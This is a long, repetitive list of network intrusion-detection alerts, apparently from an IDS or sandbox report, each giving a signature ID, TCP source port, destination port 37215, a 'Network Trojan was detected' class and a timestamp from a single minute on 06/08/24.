          SID:2829579
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191389
          SID:2835222
          Source Port:48966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731967
          SID:2835222
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404686
          SID:2835222
          Source Port:38844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511302
          SID:2829579
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352325
          SID:2835222
          Source Port:40436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017951
          SID:2835222
          Source Port:36292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239903
          SID:2835222
          Source Port:57726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446037
          SID:2829579
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174761
          SID:2835222
          Source Port:35102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.856854
          SID:2829579
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266267
          SID:2829579
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709262
          SID:2829579
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817335
          SID:2835222
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789084
          SID:2835222
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406989
          SID:2835222
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267744
          SID:2829579
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017931
          SID:2835222
          Source Port:60272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163134
          SID:2829579
          Source Port:52260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130196
          SID:2835222
          Source Port:35260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446075
          SID:2829579
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843683
          SID:2835222
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813895
          SID:2835222
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2835222
          Source Port:49100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352340
          SID:2829579
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110817
          SID:2829579
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800750
          SID:2835222
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070951
          SID:2829579
          Source Port:60138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460681
          SID:2835222
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598668
          SID:2829579
          Source Port:38028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.105499
          SID:2835222
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395154
          SID:2835222
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2835222
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242732
          SID:2835222
          Source Port:41526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063239
          SID:2829579
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155311
          SID:2835222
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912595
          SID:2835222
          Source Port:33992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172924
          SID:2835222
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132705
          SID:2829579
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552392
          SID:2835222
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106848
          SID:2835222
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730408
          SID:2835222
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895059
          SID:2829579
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445992
          SID:2835222
          Source Port:43766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264855
          SID:2829579
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466442
          SID:2829579
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168233
          SID:2835222
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272974
          SID:2829579
          Source Port:40052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795337
          SID:2835222
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405201
          SID:2829579
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860762
          SID:2829579
          Source Port:45100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239157
          SID:2835222
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467640
          SID:2835222
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780784
          SID:2835222
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407207
          SID:2835222
          Source Port:50750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021512
          SID:2835222
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403609
          SID:2829579
          Source Port:45480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897141
          SID:2829579
          Source Port:58588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549911
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781506
          SID:2835222
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242990
          SID:2835222
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799347
          SID:2829579
          Source Port:56208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729363
          SID:2835222
          Source Port:52044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509385
          SID:2829579
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898044
          SID:2835222
          Source Port:54926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276176
          SID:2835222
          Source Port:46584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014714
          SID:2829579
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259133
          SID:2829579
          Source Port:58128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671620
          SID:2835222
          Source Port:55224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402120
          SID:2835222
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817462
          SID:2829579
          Source Port:60932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602204
          SID:2829579
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404567
          SID:2829579
          Source Port:48608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471854
          SID:2829579
          Source Port:57670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460381
          SID:2829579
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262191
          SID:2829579
          Source Port:56648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731801
          SID:2829579
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356631
          SID:2829579
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547359
          SID:2829579
          Source Port:60008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709471
          SID:2835222
          Source Port:52088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855213
          SID:2835222
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.833538
          SID:2829579
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745767
          SID:2835222
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188996
          SID:2829579
          Source Port:39282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515489
          SID:2835222
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237486
          SID:2829579
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259646
          SID:2835222
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858282
          SID:2829579
          Source Port:39816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177739
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242409
          SID:2829579
          Source Port:56658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402077
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708689
          SID:2829579
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.365372
          SID:2835222
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134206
          SID:2835222
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110940
          SID:2829579
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739391
          SID:2835222
          Source Port:42122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351866
          SID:2835222
          Source Port:35176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237591
          SID:2829579
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800941
          SID:2829579
          Source Port:49510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787625
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128764
          SID:2829579
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056598
          SID:2835222
          Source Port:38232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109074
          SID:2835222
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595252
          SID:2829579
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731770
          SID:2829579
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861225
          SID:2835222
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512234
          SID:2829579
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887760
          SID:2835222
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268009
          SID:2829579
          Source Port:53830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551103
          SID:2835222
          Source Port:47010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161321
          SID:2829579
          Source Port:37612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812960
          SID:2835222
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175060
          SID:2829579
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801972
          SID:2829579
          Source Port:53494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464038
          SID:2829579
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671895
          SID:2829579
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461123
          SID:2835222
          Source Port:50996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738969
          SID:2829579
          Source Port:57906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014768
          SID:2829579
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745496
          SID:2835222
          Source Port:37654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014603
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551823
          SID:2829579
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734402
          SID:2835222
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107263
          SID:2829579
          Source Port:46566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746528
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133174
          SID:2835222
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745812
          SID:2829579
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516371
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600901
          SID:2829579
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270754
          SID:2835222
          Source Port:48528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035618
          SID:2829579
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843983
          SID:2835222
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136065
          SID:2835222
          Source Port:33546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745736
          SID:2835222
          Source Port:35474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786420
          SID:2829579
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099348
          SID:2829579
          Source Port:43082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466171
          SID:2835222
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732638
          SID:2835222
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733355
          SID:2829579
          Source Port:43934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081179
          SID:2829579
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730524
          SID:2829579
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354086
          SID:2829579
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704525
          SID:2829579
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862534
          SID:2829579
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005801
          SID:2835222
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352100
          SID:2829579
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403086
          SID:2835222
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173553
          SID:2835222
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732691
          SID:2835222
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810358
          SID:2829579
          Source Port:40618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744994
          SID:2829579
          Source Port:35170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672362
          SID:2829579
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159700
          SID:2835222
          Source Port:54764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394237
          SID:2835222
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155245
          SID:2835222
          Source Port:46796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153499
          SID:2829579
          Source Port:51604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703924
          SID:2835222
          Source Port:49958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794245
          SID:2829579
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153756
          SID:2829579
          Source Port:60842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674428
          SID:2835222
          Source Port:48040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675064
          SID:2835222
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275336
          SID:2829579
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135569
          SID:2829579
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275629
          SID:2835222
          Source Port:45986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466182
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058639
          SID:2829579
          Source Port:36776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155265
          SID:2829579
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670384
          SID:2829579
          Source Port:57066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242306
          SID:2829579
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551041
          SID:2829579
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857997
          SID:2835222
          Source Port:54270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911915
          SID:2835222
          Source Port:35232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809088
          SID:2829579
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015930
          SID:2835222
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846705
          SID:2835222
          Source Port:51524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237232
          SID:2835222
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152871
          SID:2829579
          Source Port:43036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271519
          SID:2835222
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542640
          SID:2829579
          Source Port:37608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402575
          SID:2829579
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446714
          SID:2829579
          Source Port:53422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465272
          SID:2829579
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238592
          SID:2829579
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811600
          SID:2829579
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271969
          SID:2835222
          Source Port:46110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663813
          SID:2829579
          Source Port:45624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2835222
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353220
          SID:2829579
          Source Port:52264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884623
          SID:2835222
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075613
          SID:2829579
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037062
          SID:2829579
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745039
          SID:2829579
          Source Port:52674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109412
          SID:2835222
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896841
          SID:2835222
          Source Port:49578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174916
          SID:2835222
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599786
          SID:2835222
          Source Port:47896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019717
          SID:2829579
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115666
          SID:2829579
          Source Port:48912
          Destination Port:37215
